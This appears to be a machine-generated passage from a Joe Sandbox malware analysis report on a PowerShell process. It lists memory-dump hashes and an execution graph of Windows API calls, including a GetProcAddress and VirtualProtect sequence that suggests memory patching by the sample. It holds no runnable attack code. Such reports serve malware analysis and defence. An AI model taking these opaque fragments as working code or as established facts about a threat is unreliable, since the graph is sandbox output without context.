                                            • Opcode Fuzzy Hash: a9e2df68088f9131e2f032e0295922d6338888134a00ebbffaa9cac004d67606
                                            • Instruction Fuzzy Hash: 6C216BF270031EABDB645B7A9810B3BB6D65FC5714F24853AE605CB2C5EEB5D880C361
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54a5236b958e718fa99ecbfe540c746431510a5bfdb05b44a8f11f804d9ed4de
                                            • Instruction ID: 6828971c86cc50dd97cadabd0823b5953cc59a30725fd39be1b3cda247117a44
                                            • Opcode Fuzzy Hash: 54a5236b958e718fa99ecbfe540c746431510a5bfdb05b44a8f11f804d9ed4de
                                            • Instruction Fuzzy Hash: 022104F1B00302AFCB118E74896077E7BF29F82254F0941BAE901EB292DB758955C762
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae29a3180f65bb1b06244beab1a82d290830c162f37e3b39700ad4256ca793c9
                                            • Instruction ID: 00287c149aeb9816d812f81759a5d9f22b77993eb6dfe421f2a73006daa9478a
                                            • Opcode Fuzzy Hash: ae29a3180f65bb1b06244beab1a82d290830c162f37e3b39700ad4256ca793c9
                                            • Instruction Fuzzy Hash: CD21F7F1A01207DBDB609E25850077E76E5BFC4680F1C427AE911EF295EB39E980C3A2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 289f4c90f535c55f8af1388b2f4cb75c71cc595f7eaa3264fc829cb95760451b
                                            • Instruction ID: 7ebe479fa1a8be5762e79ccccb9cf8d5b15179d598a07ed8b803ee702be746eb
                                            • Opcode Fuzzy Hash: 289f4c90f535c55f8af1388b2f4cb75c71cc595f7eaa3264fc829cb95760451b
                                            • Instruction Fuzzy Hash: F8214BF5A043589FCB548F7588001BDBFF5AF45210B2582BAC815EB355D6349D80CBA1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f1e83d934ff15e3d1640daf76c0c91ffac550c68dd453d6d233e3cf8eef60f9a
                                            • Instruction ID: 221fec3c0e69f72819058ab3f11ae33c881b39580a18c98dd61ab79f6f9c1aab
                                            • Opcode Fuzzy Hash: f1e83d934ff15e3d1640daf76c0c91ffac550c68dd453d6d233e3cf8eef60f9a
                                            • Instruction Fuzzy Hash: E1218BF230434AABDB214B79891077A7AE61FC2600F184167E944DB2CAEAB9D980C321
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09b81eb5b39197c9c6cc274623b90e3ab36c25e6fc18b0fc160668fe66c30102
                                            • Instruction ID: d23ee7aaa8ed606f5fa6b69de4912a361e6cdd4ff7535ad3545297e8fc8d42c6
                                            • Opcode Fuzzy Hash: 09b81eb5b39197c9c6cc274623b90e3ab36c25e6fc18b0fc160668fe66c30102
                                            • Instruction Fuzzy Hash: 6211C4F23002059BDB608E15C980B7AB7A6DFC0658F58C2B5EA19AF251C736DD81C7E9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b58444408763756a23ae02c3e78890430af66647d58c32e74fcd091da069c56
                                            • Instruction ID: 3cb24da8c9609cb5271c17be7410a3d65db4d1a4c69625c3a03ab7638b580e1d
                                            • Opcode Fuzzy Hash: 7b58444408763756a23ae02c3e78890430af66647d58c32e74fcd091da069c56
                                            • Instruction Fuzzy Hash: DB017BB630021EDBCB6047AAE50017AF7DADFC6222F14C23FD958CB640DA32C8A1C360
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e95e0062482d01af1d9861826177e8d17e08ae58263f57140289948a10d048d4
                                            • Instruction ID: a90769dc3dd36b0d65fe16dafe1d166f51195c50b5e1152c0365bd8e70d9b7ff
                                            • Opcode Fuzzy Hash: e95e0062482d01af1d9861826177e8d17e08ae58263f57140289948a10d048d4
                                            • Instruction Fuzzy Hash: 4A11E975A00219EFDB05CF98D884E9DFBB2FF88314F289559E404AB365C771B982CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048431593.000000000291D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0291D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_291d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 83b5dd0b492f98b534fab8cbcfe8f13301bab025fd32eb8eb0441c8902a45724
                                            • Instruction ID: 1f2d3a93974b3d69012a5ba0aaff4b847e81a4b10c2c3e10a5a971452cee18f2
                                            • Opcode Fuzzy Hash: 83b5dd0b492f98b534fab8cbcfe8f13301bab025fd32eb8eb0441c8902a45724
                                            • Instruction Fuzzy Hash: A801D672505348EAE7104E2BCDC4B67BF9CDF41374F18C45AEE495B242C7B99941C6B1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048431593.000000000291D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0291D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_291d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b659f8b5d200ad7a500c60e3487668eddca467adae4c4ec3f56078444074cb5f
                                            • Instruction ID: ed0b7ba0e25aa1c91ac8e74b3f8b75c46ecfbbb549faa1490bacbaa260e6d80a
                                            • Opcode Fuzzy Hash: b659f8b5d200ad7a500c60e3487668eddca467adae4c4ec3f56078444074cb5f
                                            • Instruction Fuzzy Hash: 7401007140E3C49EE7164B258994756BFB8DF43224F1981DBD9888F1A3C2695845C772
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,S{l$,S{l$d5kk$xS{l
                                            • API String ID: 0-1856489247
                                            • Opcode ID: 0b217aff2a8f46a709846226c39917ed088152047e468b1b3e1eb2cfea6483c4
                                            • Instruction ID: 524bb7498618add0f5ebbd1fc3141dacc9bb945397a895bdc49a72509ae1056f
                                            • Opcode Fuzzy Hash: 0b217aff2a8f46a709846226c39917ed088152047e468b1b3e1eb2cfea6483c4
                                            • Instruction Fuzzy Hash: 2EE116F1B14216CFCB548F7CC8406ABBBE6AFC6214B1882BBC555DB256DA31EC41C792
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$(f{l$(f{l$(f{l
                                            • API String ID: 0-1666391692
                                            • Opcode ID: 6ab83471e18ff6deb0078a0719265aa54e7b2db7f43fafde2f1c07345f74ff63
                                            • Instruction ID: 98496a0674814fdfead810a5f3152137b6a07b36650c057d5c967a64a47a129b
                                            • Opcode Fuzzy Hash: 6ab83471e18ff6deb0078a0719265aa54e7b2db7f43fafde2f1c07345f74ff63
                                            • Instruction Fuzzy Hash: C3719CF0E00246DFDB54CFA8C540B6EBBE2AF88318F148269E915AB755CB71DD41CB91

                                            Execution Graph

                                            Execution Coverage:2.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.4%
                                            Total number of Nodes:1581
                                            Total number of Limit Nodes:5
                                            execution_graph 7024 24399db8 7025 24399dbf 7024->7025 7026 24399ddf 7025->7026 7027 24399e20 7025->7027 7028 2439a90e 7026->7028 7031 2439aa17 21 API calls 7026->7031 7027->7028 7029 2439aa17 21 API calls 7027->7029 7030 24399e6e 7029->7030 7032 2439a93e 7031->7032 6016 2439543d 6017 24395440 6016->6017 6020 243955a8 6017->6020 6031 24397613 6020->6031 6023 243955e0 6067 24394bc1 6023->6067 6024 243955c2 IsProcessorFeaturePresent 6027 243955cd 6024->6027 6026 243955b8 6026->6023 6026->6024 6061 243960e2 6027->6061 6070 24397581 6031->6070 6034 2439766e 6035 2439767a _abort 6034->6035 6036 24395b7a _abort 20 API calls 6035->6036 6041 243976a7 _abort 6035->6041 6042 243976a1 _abort 6035->6042 6036->6042 6037 243976f3 6038 24396368 __dosmaperr 20 API calls 6037->6038 6040 243976f8 6038->6040 6039 243976d6 6116 2439bdc9 6039->6116 6084 243962ac 6040->6084 6047 2439771f 6041->6047 6087 24395671 RtlEnterCriticalSection 6041->6087 6042->6037 6042->6039 6042->6041 6048 2439777e 6047->6048 6050 24397776 6047->6050 6058 243977a9 6047->6058 6088 243956b9 RtlLeaveCriticalSection 6047->6088 6048->6058 6089 24397665 6048->6089 6053 24394bc1 _abort 28 API calls 6050->6053 6053->6048 6057 24397665 _abort 38 API calls 6057->6058 6092 2439782e 6058->6092 6059 2439780c 6059->6039 6060 24395af6 _abort 38 API calls 6059->6060 6060->6039 6062 243960fe ___scrt_fastfail 6061->6062 6063 2439612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6062->6063 6066 243961fb ___scrt_fastfail 6063->6066 6064 24392ada _ValidateLocalCookies 5 API calls 6065 24396219 6064->6065 6065->6023 6066->6064 6135 2439499b 6067->6135 6073 24397527 6070->6073 6072 243955ad 6072->6026 6072->6034 6074 24397533 ___scrt_is_nonwritable_in_current_image 6073->6074 6079 24395671 RtlEnterCriticalSection 6074->6079 6076 24397541 6080 24397575 6076->6080 6078 24397568 _abort 6078->6072 6079->6076 6083 243956b9 RtlLeaveCriticalSection 6080->6083 6082 2439757f 6082->6078 6083->6082 6119 24396231 6084->6119 6086 243962b8 6086->6039 6087->6047 6088->6050 6090 24395af6 _abort 38 API calls 6089->6090 6091 2439766a 6090->6091 6091->6057 6093 243977fd 6092->6093 6094 24397834 6092->6094 6093->6039 6093->6059 6096 24395af6 GetLastError 6093->6096 6134 243956b9 RtlLeaveCriticalSection 6094->6134 6097 24395b12 6096->6097 6098 24395b0c 6096->6098 6100 2439637b _abort 20 API calls 6097->6100 6102 24395b61 SetLastError 6097->6102 6099 24395e08 _abort 11 API calls 6098->6099 6099->6097 6101 24395b24 6100->6101 6103 24395b2c 6101->6103 6104 24395e5e _abort 11 API calls 6101->6104 6102->6059 6105 2439571e _free 20 API calls 6103->6105 6106 24395b41 6104->6106 6108 24395b32 6105->6108 6106->6103 6107 24395b48 6106->6107 6109 2439593c _abort 20 API calls 6107->6109 6110 24395b6d SetLastError 6108->6110 6111 24395b53 6109->6111 6112 243955a8 _abort 35 API calls 6110->6112 6113 2439571e _free 20 API calls 6111->6113 6114 24395b79 6112->6114 6115 24395b5a 6113->6115 6115->6102 6115->6110 6117 24392ada _ValidateLocalCookies 5 API calls 6116->6117 6118 2439bdd4 6117->6118 6118->6118 6120 24395b7a _abort 20 API calls 6119->6120 6121 24396247 6120->6121 6122 243962a6 6121->6122 6124 24396255 6121->6124 6130 243962bc IsProcessorFeaturePresent 6122->6130 6127 24392ada _ValidateLocalCookies 5 API calls 6124->6127 6125 243962ab 6126 24396231 _abort 26 API calls 6125->6126 6128 243962b8 6126->6128 6129 2439627c 6127->6129 6128->6086 6129->6086 6131 243962c7 6130->6131 6132 243960e2 _abort 8 API calls 6131->6132 6133 243962dc GetCurrentProcess TerminateProcess 6132->6133 6133->6125 6134->6093 6136 243949a7 _abort 6135->6136 6137 243949bf 6136->6137 6157 24394af5 GetModuleHandleW 6136->6157 6166 24395671 RtlEnterCriticalSection 6137->6166 6141 24394a65 6174 24394aa5 6141->6174 6145 24394a3c 6148 24394a54 6145->6148 6170 24394669 6145->6170 6146 24394aae 6152 2439bdc9 _abort 5 API calls 6146->6152 6147 24394a82 6177 24394ab4 6147->6177 6154 24394669 _abort 5 API calls 6148->6154 6149 243949c7 6149->6141 6149->6145 6167 2439527a 6149->6167 6156 24394ab3 6152->6156 6154->6141 6158 243949b3 6157->6158 6158->6137 6159 24394b39 GetModuleHandleExW 6158->6159 6160 24394b63 GetProcAddress 6159->6160 6163 24394b78 6159->6163 6160->6163 6161 24394b8c FreeLibrary 6162 24394b95 6161->6162 6164 24392ada _ValidateLocalCookies 5 API calls 6162->6164 6163->6161 6163->6162 6165 24394b9f 6164->6165 6165->6137 6166->6149 6185 24395132 6167->6185 6171 24394698 6170->6171 6172 24392ada _ValidateLocalCookies 5 API calls 6171->6172 6173 243946c1 6172->6173 6173->6148 6207 243956b9 RtlLeaveCriticalSection 6174->6207 6176 24394a7e 6176->6146 6176->6147 6208 24396025 6177->6208 6180 24394ae2 6182 24394b39 _abort 8 API calls 6180->6182 6181 24394ac2 GetPEB 6181->6180 6183 24394ad2 GetCurrentProcess TerminateProcess 6181->6183 6184 24394aea ExitProcess 6182->6184 6183->6180 6188 243950e1 6185->6188 6187 24395156 6187->6145 6189 243950ed ___scrt_is_nonwritable_in_current_image 6188->6189 6196 24395671 RtlEnterCriticalSection 6189->6196 6191 243950fb 6197 2439515a 6191->6197 6195 24395119 _abort 6195->6187 6196->6191 6198 2439517a 6197->6198 6201 24395182 6197->6201 6199 24392ada _ValidateLocalCookies 5 API calls 6198->6199 6200 24395108 6199->6200 6203 24395126 6200->6203 6201->6198 6202 2439571e _free 20 API calls 6201->6202 6202->6198 6206 243956b9 RtlLeaveCriticalSection 6203->6206 6205 24395130 6205->6195 6206->6205 6207->6176 6209 2439604a 6208->6209 6210 24396040 6208->6210 6211 24395c45 _abort 5 API calls 6209->6211 6212 24392ada _ValidateLocalCookies 5 API calls 6210->6212 6211->6210 6213 24394abe 6212->6213 6213->6180 6213->6181 6214 24391f3f 6215 24391f4b ___scrt_is_nonwritable_in_current_image 6214->6215 6232 2439247c 6215->6232 6217 24391f52 6218 24391f7c 6217->6218 6219 24392041 6217->6219 6225 24391f57 ___scrt_is_nonwritable_in_current_image 6217->6225 6243 243923de 6218->6243 6255 24392639 IsProcessorFeaturePresent 6219->6255 6222 24392048 6223 24391f8b __RTC_Initialize 6223->6225 6246 243922fc RtlInitializeSListHead 6223->6246 6226 24391f99 ___scrt_initialize_default_local_stdio_options 6247 243946c5 6226->6247 6230 24391fb8 6230->6225 6231 24394669 _abort 5 API calls 6230->6231 6231->6225 6233 24392485 6232->6233 6259 24392933 IsProcessorFeaturePresent 6233->6259 6237 24392496 6238 2439249a 6237->6238 6270 243953c8 6237->6270 6238->6217 6241 243924b1 6241->6217 6344 243924b5 6243->6344 6245 243923e5 6245->6223 6246->6226 6249 243946dc 6247->6249 6248 24392ada _ValidateLocalCookies 5 API calls 6250 24391fad 6248->6250 6249->6248 6250->6225 6251 243923b3 6250->6251 6252 243923b8 ___scrt_release_startup_lock 6251->6252 6253 24392933 ___isa_available_init IsProcessorFeaturePresent 6252->6253 6254 243923c1 6252->6254 6253->6254 6254->6230 6256 2439264e ___scrt_fastfail 6255->6256 6257 243926f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6256->6257 6258 24392744 ___scrt_fastfail 6257->6258 6258->6222 6260 24392491 6259->6260 6261 243934ea 6260->6261 6262 243934ef ___vcrt_initialize_winapi_thunks 6261->6262 6281 24393936 6262->6281 6266 24393505 6267 24393510 6266->6267 6295 24393972 6266->6295 6267->6237 6269 243934fd 6269->6237 6336 24397457 6270->6336 6273 24393529 6274 24393532 6273->6274 6275 24393543 6273->6275 6276 2439391b ___vcrt_uninitialize_ptd 6 API calls 6274->6276 6275->6238 6277 24393537 6276->6277 6278 24393972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6277->6278 6279 2439353c 6278->6279 6340 24393c50 6279->6340 6282 2439393f 6281->6282 6284 24393968 6282->6284 6285 243934f9 6282->6285 6299 24393be0 6282->6299 6286 24393972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6284->6286 6285->6269 6287 243938e8 6285->6287 6286->6285 6317 24393af1 6287->6317 6290 243938fd 6290->6266 6293 24393918 6293->6266 6296 2439399c 6295->6296 6297 2439397d 6295->6297 6296->6269 6298 24393987 RtlDeleteCriticalSection 6297->6298 6298->6296 6298->6298 6304 24393a82 6299->6304 6301 24393bfa 6302 24393c18 InitializeCriticalSectionAndSpinCount 6301->6302 6303 24393c03 6301->6303 6302->6303 6303->6282 6305 24393aaa 6304->6305 6309 24393aa6 __crt_fast_encode_pointer 6304->6309 6305->6309 6310 243939be 6305->6310 6308 24393ac4 GetProcAddress 6308->6309 6309->6301 6311 243939cd try_get_first_available_module 6310->6311 6312 243939ea LoadLibraryExW 6311->6312 6314 24393a60 FreeLibrary 6311->6314 6315 24393a77 6311->6315 6316 24393a38 LoadLibraryExW 6311->6316 6312->6311 6313 24393a05 GetLastError 6312->6313 6313->6311 6314->6311 6315->6308 6315->6309 6316->6311 6318 24393a82 try_get_function 5 API calls 6317->6318 6319 24393b0b 6318->6319 6320 24393b24 TlsAlloc 6319->6320 6321 243938f2 6319->6321 6321->6290 6322 24393ba2 6321->6322 6323 24393a82 try_get_function 5 API calls 6322->6323 6324 24393bbc 6323->6324 6325 2439390b 6324->6325 6326 24393bd7 TlsSetValue 6324->6326 6325->6293 6327 2439391b 6325->6327 6326->6325 6328 2439392b 6327->6328 6329 24393925 6327->6329 6328->6290 6331 24393b2c 6329->6331 6332 24393a82 try_get_function 5 API calls 6331->6332 6333 24393b46 6332->6333 6334 24393b5e TlsFree 6333->6334 6335 24393b52 6333->6335 6334->6335 6335->6328 6339 24397470 6336->6339 6337 24392ada _ValidateLocalCookies 5 API calls 6338 243924a3 6337->6338 6338->6241 6338->6273 6339->6337 6341 24393c7f 6340->6341 6343 24393c59 6340->6343 6341->6275 6342 24393c69 FreeLibrary 6342->6343 6343->6341 6343->6342 6345 243924c8 6344->6345 6346 243924c4 6344->6346 6347 24392639 ___scrt_fastfail 4 API calls 6345->6347 6349 243924d5 ___scrt_release_startup_lock 6345->6349 6346->6245 6348 24392559 6347->6348 6349->6245 7033 243967bf 7038 243967f4 7033->7038 7036 243967db 7037 2439571e _free 20 API calls 7037->7036 7039 24396806 7038->7039 7048 243967cd 7038->7048 7040 2439680b 7039->7040 7041 24396836 7039->7041 7042 2439637b _abort 20 API calls 7040->7042 7041->7048 7049 243971d6 7041->7049 7043 24396814 7042->7043 7045 2439571e _free 20 API calls 7043->7045 7045->7048 7046 24396851 7047 2439571e _free 20 API calls 7046->7047 7047->7048 7048->7036 7048->7037 7050 243971e1 7049->7050 7051 24397209 7050->7051 7052 243971fa 7050->7052 7053 24397218 7051->7053 7058 24398a98 7051->7058 7054 24396368 __dosmaperr 20 API calls 7052->7054 7065 24398acb 7053->7065 7057 243971ff ___scrt_fastfail 7054->7057 7057->7046 7059 24398ab8 RtlSizeHeap 7058->7059 7060 24398aa3 7058->7060 7059->7053 7061 24396368 __dosmaperr 20 API calls 7060->7061 7062 24398aa8 7061->7062 7063 243962ac _abort 26 API calls 7062->7063 7064 24398ab3 7063->7064 7064->7053 7066 24398ad8 7065->7066 7067 24398ae3 7065->7067 7077 243956d0 7066->7077 7069 24398aeb 7067->7069 7076 24398af4 _abort 7067->7076 7070 2439571e _free 20 API calls 7069->7070 7074 24398ae0 7070->7074 7071 24398af9 7073 24396368 __dosmaperr 20 API calls 7071->7073 7072 24398b1e RtlReAllocateHeap 7072->7074 7072->7076 7073->7074 7074->7057 7075 2439474f _abort 7 API calls 7075->7076 7076->7071 7076->7072 7076->7075 7078 2439570e 7077->7078 7082 243956de _abort 7077->7082 7079 24396368 __dosmaperr 20 API calls 7078->7079 7081 2439570c 7079->7081 7080 243956f9 RtlAllocateHeap 7080->7081 7080->7082 7081->7074 7082->7078 7082->7080 7083 2439474f _abort 7 API calls 7082->7083 7083->7082 7296 24395bff 7304 24395d5c 7296->7304 7299 24395c13 7300 24395b7a _abort 20 API calls 7301 24395c1b 7300->7301 7302 24395c28 7301->7302 7303 24395c2b 11 API calls 7301->7303 7303->7299 7305 24395c45 _abort 5 API calls 7304->7305 7306 24395d83 7305->7306 7307 24395d9b TlsAlloc 7306->7307 7308 24395d8c 7306->7308 7307->7308 7309 24392ada _ValidateLocalCookies 5 API calls 7308->7309 7310 24395c09 7309->7310 7310->7299 7310->7300 6444 24399e71 6446 24399e95 6444->6446 6445 24399f71 __startOneArgErrorHandling 6451 2439acad __startOneArgErrorHandling 6445->6451 6462 2439b2f0 6445->6462 6446->6445 6447 24399ee6 6446->6447 6448 24399ef8 6447->6448 6452 2439aa53 6447->6452 6453 2439aa70 RtlDecodePointer 6452->6453 6456 2439aa80 6452->6456 6453->6456 6454 2439ab02 6455 24392ada _ValidateLocalCookies 5 API calls 6454->6455 6458 2439ac67 6455->6458 6456->6454 6457 2439ab0d 6456->6457 6460 2439aab7 6456->6460 6457->6454 6459 24396368 __dosmaperr 20 API calls 6457->6459 6458->6448 6459->6454 6460->6454 6461 24396368 __dosmaperr 20 API calls 6460->6461 6461->6454 6463 2439b329 __startOneArgErrorHandling 6462->6463 6465 2439b350 __startOneArgErrorHandling 6463->6465 6473 2439b5c1 6463->6473 6466 2439b393 6465->6466 6467 2439b36e 6465->6467 6486 2439b8b2 6466->6486 6477 2439b8e1 6467->6477 6470 2439b38e __startOneArgErrorHandling 6471 24392ada _ValidateLocalCookies 5 API calls 6470->6471 6472 2439b3b7 6471->6472 6472->6451 6474 2439b5ec __raise_exc 6473->6474 6475 2439b7e5 RaiseException 6474->6475 6476 2439b7fd 6475->6476 6476->6465 6478 2439b8f0 6477->6478 6479 2439b90f __startOneArgErrorHandling 6478->6479 6480 2439b964 __startOneArgErrorHandling 6478->6480 6493 243978a3 6479->6493 6482 2439b8b2 __startOneArgErrorHandling 20 API calls 6480->6482 6484 2439b95d 6482->6484 6484->6470 6485 2439b8b2 __startOneArgErrorHandling 20 API calls 6485->6484 6487 2439b8bf 6486->6487 6488 2439b8d4 6486->6488 6490 24396368 __dosmaperr 20 API calls 6487->6490 6491 2439b8d9 6487->6491 6489 24396368 __dosmaperr 20 API calls 6488->6489 6489->6491 6492 2439b8cc 6490->6492 6491->6470 6492->6470 6495 243978cb 6493->6495 6494 24392ada _ValidateLocalCookies 5 API calls 6496 243978e8 6494->6496 6495->6494 6496->6484 6496->6485 6350 24395630 6351 2439563b 6350->6351 6353 24395664 6351->6353 6355 24395660 6351->6355 6356 24395eb7 6351->6356 6363 24395688 6353->6363 6357 24395c45 _abort 5 API calls 6356->6357 6358 24395ede 6357->6358 6359 24395efc InitializeCriticalSectionAndSpinCount 6358->6359 6360 24395ee7 6358->6360 6359->6360 6361 24392ada _ValidateLocalCookies 5 API calls 6360->6361 6362 24395f13 6361->6362 6362->6351 6364 243956b4 6363->6364 6365 24395695 6363->6365 6364->6355 6366 2439569f RtlDeleteCriticalSection 6365->6366 6366->6364 6366->6366 6497 24393370 6508 24393330 6497->6508 6509 2439334f 6508->6509 6510 24393342 6508->6510 6511 24392ada _ValidateLocalCookies 5 API calls 6510->6511 6511->6509 7311 243963f0 7312 24396400 7311->7312 7321 24396416 7311->7321 7313 24396368 __dosmaperr 20 API calls 7312->7313 7314 24396405 7313->7314 7316 243962ac _abort 26 API calls 7314->7316 7317 2439640f 7316->7317 7318 24396480 7318->7318 7341 24394e76 7318->7341 7320 243964ee 7323 2439571e _free 20 API calls 7320->7323 7321->7318 7324 24396561 7321->7324 7330 24396580 7321->7330 7322 243964e5 7322->7320 7327 24396573 7322->7327 7347 243985eb 7322->7347 7323->7324 7356 2439679a 7324->7356 7328 243962bc _abort 11 API calls 7327->7328 7329 2439657f 7328->7329 7331 2439658c 7330->7331 7332 2439637b _abort 20 API calls 7331->7332 7333 243965ba 7332->7333 7334 243985eb 26 API calls 7333->7334 7335 243965e6 7334->7335 7336 243962bc _abort 11 API calls 7335->7336 7337 24396615 ___scrt_fastfail 7336->7337 7338 243966b6 FindFirstFileExA 7337->7338 7339 24396705 7338->7339 7340 24396580 26 API calls 7339->7340 7342 24394e8b 7341->7342 7343 24394e87 7341->7343 7342->7343 7344 2439637b _abort 20 API calls 7342->7344 7343->7322 7345 24394eb9 7344->7345 7346 2439571e _free 20 API calls 7345->7346 7346->7343 7349 2439853a 7347->7349 7348 2439854f 7350 24396368 __dosmaperr 20 API calls 7348->7350 7351 24398554 7348->7351 7349->7348 7349->7351 7353 2439858b 7349->7353 7355 2439857a 7350->7355 7351->7322 7352 243962ac _abort 26 API calls 7352->7351 7353->7351 7354 24396368 __dosmaperr 20 API calls 7353->7354 7354->7355 7355->7352 7357 243967a4 7356->7357 7358 243967b4 7357->7358 7359 2439571e _free 20 API calls 7357->7359 7360 2439571e _free 20 API calls 7358->7360 7359->7357 7361 243967bb 7360->7361 7361->7317 7088 24393eb3 7091 24395411 7088->7091 7092 2439541d _abort 7091->7092 7093 24395af6 _abort 38 API calls 7092->7093 7094 24395422 7093->7094 7095 243955a8 _abort 38 API calls 7094->7095 7096 2439544c 7095->7096 6367 2439742b 6368 24397430 6367->6368 6370 24397453 6368->6370 6371 24398bae 6368->6371 6372 24398bbb 6371->6372 6373 24398bdd 6371->6373 6374 24398bc9 RtlDeleteCriticalSection 6372->6374 6375 24398bd7 6372->6375 6373->6368 6374->6374 6374->6375 6376 2439571e _free 20 API calls 6375->6376 6376->6373 6512 2439ac6b 6513 2439ac84 __startOneArgErrorHandling 6512->6513 6514 2439b2f0 21 API calls 6513->6514 6515 2439acad __startOneArgErrorHandling 6513->6515 6514->6515 7097 243960ac 7098 243960dd 7097->7098 7099 243960b7 7097->7099 7099->7098 7100 243960c7 FreeLibrary 7099->7100 7100->7099 6516 2439506f 6517 24395087 6516->6517 6518 24395081 6516->6518 6519 24395000 20 API calls 6518->6519 6519->6517 7101 243921a1 ___scrt_dllmain_exception_filter 7102 243981a0 7103 243981d9 7102->7103 7104 243981dd 7103->7104 7115 24398205 7103->7115 7105 24396368 __dosmaperr 20 API calls 7104->7105 7106 243981e2 7105->7106 7108 243962ac _abort 26 API calls 7106->7108 7107 24398529 7109 24392ada _ValidateLocalCookies 5 API calls 7107->7109 7110 243981ed 7108->7110 7111 24398536 7109->7111 7112 24392ada _ValidateLocalCookies 5 API calls 7110->7112 7113 243981f9 7112->7113 7115->7107 7116 243980c0 7115->7116 7119 243980db 7116->7119 7117 24392ada _ValidateLocalCookies 5 API calls 7118 24398152 7117->7118 7118->7115 7119->7117 7362 2439a1e0 7365 2439a1fe 7362->7365 7364 2439a1f6 7369 2439a203 7365->7369 7366 2439aa53 21 API calls 7368 2439a42f 7366->7368 7367 2439a298 7367->7364 7368->7364 7369->7366 7369->7367 5984 2439c7a7 5985 2439c7be 5984->5985 5994 2439c82c 5984->5994 5985->5994 5996 2439c7e6 GetModuleHandleA 5985->5996 5987 2439c872 5988 2439c835 GetModuleHandleA 5989 2439c83f 5988->5989 5990 2439c85f GetProcAddress 5989->5990 5989->5994 5990->5994 5991 2439c7dd 5991->5989 5992 2439c800 GetProcAddress 5991->5992 5991->5994 5993 2439c80d VirtualProtect 5992->5993 5992->5994 5993->5994 5995 2439c81c VirtualProtect 5993->5995 5994->5987 5994->5988 5994->5989 5995->5994 5997 2439c7ef 5996->5997 6005 2439c82c 5996->6005 6008 2439c803 GetProcAddress 5997->6008 5999 2439c872 6000 2439c835 GetModuleHandleA 6004 2439c83f 6000->6004 6001 2439c7f4 6002 2439c800 GetProcAddress 6001->6002 6001->6005 6003 2439c80d VirtualProtect 6002->6003 6002->6005 6003->6005 6006 2439c81c VirtualProtect 6003->6006 6004->6005 6007 2439c85f GetProcAddress 6004->6007 6005->5999 6005->6000 6005->6004 6006->6005 6007->6005 6009 2439c82c 6008->6009 6010 2439c80d VirtualProtect 6008->6010 6012 2439c872 6009->6012 6013 2439c835 GetModuleHandleA 6009->6013 6010->6009 6011 2439c81c VirtualProtect 6010->6011 6011->6009 6015 2439c83f 6013->6015 6014 2439c85f GetProcAddress 6014->6015 6015->6009 6015->6014 6377 24392418 6378 24392420 